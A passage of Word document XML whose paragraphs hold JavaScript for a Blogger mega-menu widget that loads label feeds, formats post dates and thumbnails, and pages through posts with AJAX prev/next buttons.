    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        for(var xc=0;xc&lt;k.link.length;xc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if(k.link[xc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            var pu = k.link[xc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //get date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var time = k.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //console.log('date',time);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //get a single tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        if(k.category){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var tn = k.category[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        //appenf the current label link to the url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        for(var nu=0;nu &lt; e.feed.link.length;nu++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if(e.feed.link[nu].rel == "alternate"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            var ll = e.feed.link[nu].href + '?max-results=' + perpage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $t.attr('href',ll);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //total post for the category</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var pcount = e.feed.openSearch$totalResults.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var pcs = e.feed.openSearch$startIndex.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var pcp = e.feed.openSearch$itemsPerPage.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        if(pcount &gt; 5){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var pcls = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var pcls = 'disable';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        var maxpoint = Math.ceil(pcount/pcp);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760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        if(k.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var pi = k.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if(pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            pi = pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if(pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            pi = pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                          var pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        c = c + '&lt;div class="megamenu-item"&gt;&lt;div class="imgthumb"&gt;&lt;a href="'+ pu +'"&gt;&lt;div class="mega-img" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="imglink"&gt;&lt;span class="date-pub"&gt;'+ time +'&lt;/span&gt;&lt;h3&gt;&lt;a href="'+pu+'"&gt;'+ pt +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }//for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      c = c + '&lt;div class="mega-loading"&gt;&lt;div class="mega-table"&gt;&lt;div class="mega-cell"&gt;&lt;div class="lds-ripple"&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;h3&gt;Loading..&lt;/h3&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mega-clear"&gt;&lt;/div&gt;&lt;div class="mega-naver"&gt;&lt;a href="javascript:void(0);" class="mega-navs mega-prev disable" data-stage="1" data-maxpoint="'+maxpoint+'" data-start="'+ pcs +'" data-count="'+ pcp +'" data-total="'+ pcount +'"&gt;&lt;i class="ion-chevron-left"&gt;&lt;/i&gt;&lt;/a&gt;&lt;a href="javascript:void(0)" class="mega-navs mega-next '+ pcls +'" data-stage="1" data-maxpoint="'+maxpoint+'" data-start="'+ pcs +'" data-count="'+ pcp +'" data-labelize="'+ l + '" data-total="'+ pcount +'"&gt;&lt;i class="ion-chevron-right"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      $t.parent('li').append(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $(this).append(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $(this).find('.mega-prev').click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var $at = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var $nt = $(this).closest('.mega-naver').find('.mega-next');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nust = $nt.attr('data-start');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nuco = $nt.attr('data-count');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nupt = $nt.attr('data-total');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var numa = $nt.attr('data-maxpoint');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nustg = $nt.attr('data-stage');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var lblt = $nt.attr('data-labelize');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if(nustg &lt;= 2 ){</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $(this).addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            $(this).removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if((nustg &gt;= 2) &amp;&amp; (nustg &lt;= numa)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if((nustg &lt; (numa - 1))){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $(this).closest('.mega-naver').find('.mega-next').addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $(this).closest('.mega-naver').find('.mega-next').removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(nustg == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $(this).closest('.mega-naver').find('.mega-next').removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //console.log('reauested');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //show the loading wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $(this).closest('.mega').find('.mega-loading').fadeIn();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            var startindex = Number(nust) - Number(nuco);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            var nurl = '/feeds/posts/default/-/'+ lblt +'?alt=json-in-script&amp;start-index='+ startindex +'&amp;max-results=' + nuco;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              url : nurl,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              success: function(ne) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //update details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                $nt.attr('data-start',startindex);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                $nt.attr('data-stage',(Number(nustg) - 1))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var nc = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //console.log(JSON.stringify(ne));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //process the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                if(ne.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  for(var ma=0;ma&lt;ne.feed.entry.length;ma++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var pst = ne.feed.entry[ma];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //get date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var time = pst.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var pst_title = pst.title.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    for(var pxc=0;pxc&lt;pst.link.length;pxc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      if(pst.link[pxc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        var pst_url = pst.link[pxc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    if(pst.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      var pst_pi = pst.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      if(pst_pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        pst_pi = pst_pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      if(pst_pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        pst_pi = pst_pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      var pst_pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    }//mediathumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    nc = nc + '&lt;div class="megamenu-item"&gt;&lt;div class="imgthumb"&gt;&lt;a href="'+ pst_url +'"&gt;&lt;div class="mega-img" style="background:url('+ pst_pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="imglink"&gt;&lt;span class="date-pub"&gt;'+ time +'&lt;/span&gt;&lt;h3&gt;&lt;a href="'+pst_url+'"&gt;'+ pst_title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  nc = nc + '&lt;div class="mega-loading"&gt;&lt;div class="mega-table"&gt;&lt;div class="mega-cell"&gt;&lt;div class="lds-ripple"&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3&gt;Loading..&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  $at.closest('.mega').find('.mega-item-wrap').html(nc);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//nefeed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            });//AJAX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }//run only if not page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        });//CLICK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $(this).find('.mega-next').click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var $at = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nust = $(this).attr('data-start');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nuco = $(this).attr('data-count');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nupt = $(this).attr('data-total');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var numa = $(this).attr('data-maxpoint');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nustg = $(this).attr('data-stage');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          var nlb = $(this).attr('data-labelize');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
